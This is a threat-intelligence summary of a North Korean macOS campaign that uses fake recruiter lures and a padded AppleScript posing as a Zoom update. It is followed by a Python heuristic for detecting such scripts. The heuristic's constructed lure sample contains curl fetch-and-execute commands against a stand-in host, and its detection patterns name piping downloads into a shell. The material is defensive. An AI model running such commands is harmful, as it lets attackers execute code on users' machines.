North Korea's Sapphire Sleet (an offshoot of APT38/Lazarus Group) is targeting macOS users in a multi-stage campaign. The attackers pose as recruiters on LinkedIn, lure finance professionals into phony job interviews, and then deliver a malicious AppleScript disguised as a Zoom SDK update. The script pads itself with thousands of blank lines to hide its malicious commands from a casual reader, invokes legitimate Apple binaries for cover, and chains curl commands to fetch progressively more capable payloads. The final stages harvest credentials, cryptocurrency wallets, browser history, keychains, Apple Notes, and Telegram login details. Apple has since shipped XProtect signatures and Safari Safe Browsing protections that block the campaign automatically. Organizations are advised to warn users about unsolicited LinkedIn contact and to never run scripts received through messages without IT approval.
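The two traits the summary calls out, a huge run of blank lines and shell commands that fetch with curl and hand the result straight to an interpreter, are cheap to check for when triaging an AppleScript that a user was asked to run. The following is an added example, not code from the article, Apple or Microsoft. The 200-line padding threshold, the regular expressions, the sample scripts and the host `example.invalid` are all assumptions constructed for the illustration.

```python
"""Triage heuristic for AppleScript source: blank-line padding plus curl chains.

Added example; the threshold and patterns below are assumptions, not a
published detection rule.
"""
import re

# Assumption: a short script has no legitimate reason for hundreds of
# consecutive blank lines; the campaign reportedly used thousands.
BLANK_RUN_THRESHOLD = 200

# AppleScript hands commands to the shell via: do shell script "..."
# The group captures the string body, allowing backslash-escaped quotes.
SHELL_CALL_RE = re.compile(r'do\s+shell\s+script\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)

# First URL-ish token in a shell command; stops at whitespace and shell metachars.
URL_RE = re.compile(r"https?://[^\s\"'|;&)]+", re.IGNORECASE)

# A fetched payload being executed in the same command line:
# piped into a shell/osascript, or chmod +x'd after a fetch.
EXEC_RE = re.compile(
    r"(\|\s*(?:sh|bash|zsh|osascript)\b|&&\s*(?:sh|bash|zsh|osascript|chmod\s+\+x)\b)",
    re.IGNORECASE,
)


def max_blank_run(text: str) -> int:
    """Length of the longest run of consecutive whitespace-only lines."""
    longest = run = 0
    for line in text.splitlines():
        if line.strip():
            run = 0
        else:
            run += 1
            longest = max(longest, run)
    return longest


def shell_commands(text: str) -> list[str]:
    """Bodies of every `do shell script "..."` call, with AppleScript
    string escapes (\\" and \\\\) resolved."""
    return [
        m.group(1).replace('\\"', '"').replace("\\\\", "\\")
        for m in SHELL_CALL_RE.finditer(text)
    ]


def analyze(text: str) -> dict:
    """Collect the indicators the heuristic cares about."""
    cmds = shell_commands(text)
    curl_cmds = [c for c in cmds if re.search(r"\bcurl\b", c)]
    return {
        "max_blank_run": max_blank_run(text),
        "shell_commands": cmds,
        "curl_urls": [u for c in curl_cmds for u in URL_RE.findall(c)],
        "chained_exec": any(EXEC_RE.search(c) for c in curl_cmds),
    }


def is_suspicious(report: dict) -> bool:
    """Padding combined with any network fetch, or any fetch that is
    executed in-line, is enough to hold the script for review."""
    padded = report["max_blank_run"] >= BLANK_RUN_THRESHOLD
    return (padded and bool(report["curl_urls"])) or report["chained_exec"]


# Constructed samples: a harmless dialog, and a script shaped like the lure.
BENIGN = (
    'tell application "Finder"\n'
    '    display dialog "Zoom SDK is up to date"\n'
    "end tell\n"
)

LURE = (
    'display dialog "Updating Zoom SDK..."\n'
    + "\n" * 3000  # the padding that pushes the real commands out of view
    + 'do shell script "curl -s https://example.invalid/stage1 -o /tmp/s1 '
    '&& chmod +x /tmp/s1 && /tmp/s1"\n'
    + 'do shell script "curl -s https://example.invalid/stage2 | sh"\n'
)

if __name__ == "__main__":
    for name, script in (("benign", BENIGN), ("lure", LURE)):
        report = analyze(script)
        print(name, "suspicious" if is_suspicious(report) else "clean", report["max_blank_run"], report["curl_urls"])
```

Run it against the decompiled source of a suspect script (`osadecompile file.scpt`) rather than the compiled `.scpt`, since the regexes work on text. The heuristic is deliberately narrow: it will miss a script that fetches with something other than curl or hides its padding in comments, so treat it as a quick first filter before a proper look, not as a replacement for the XProtect signatures mentioned above.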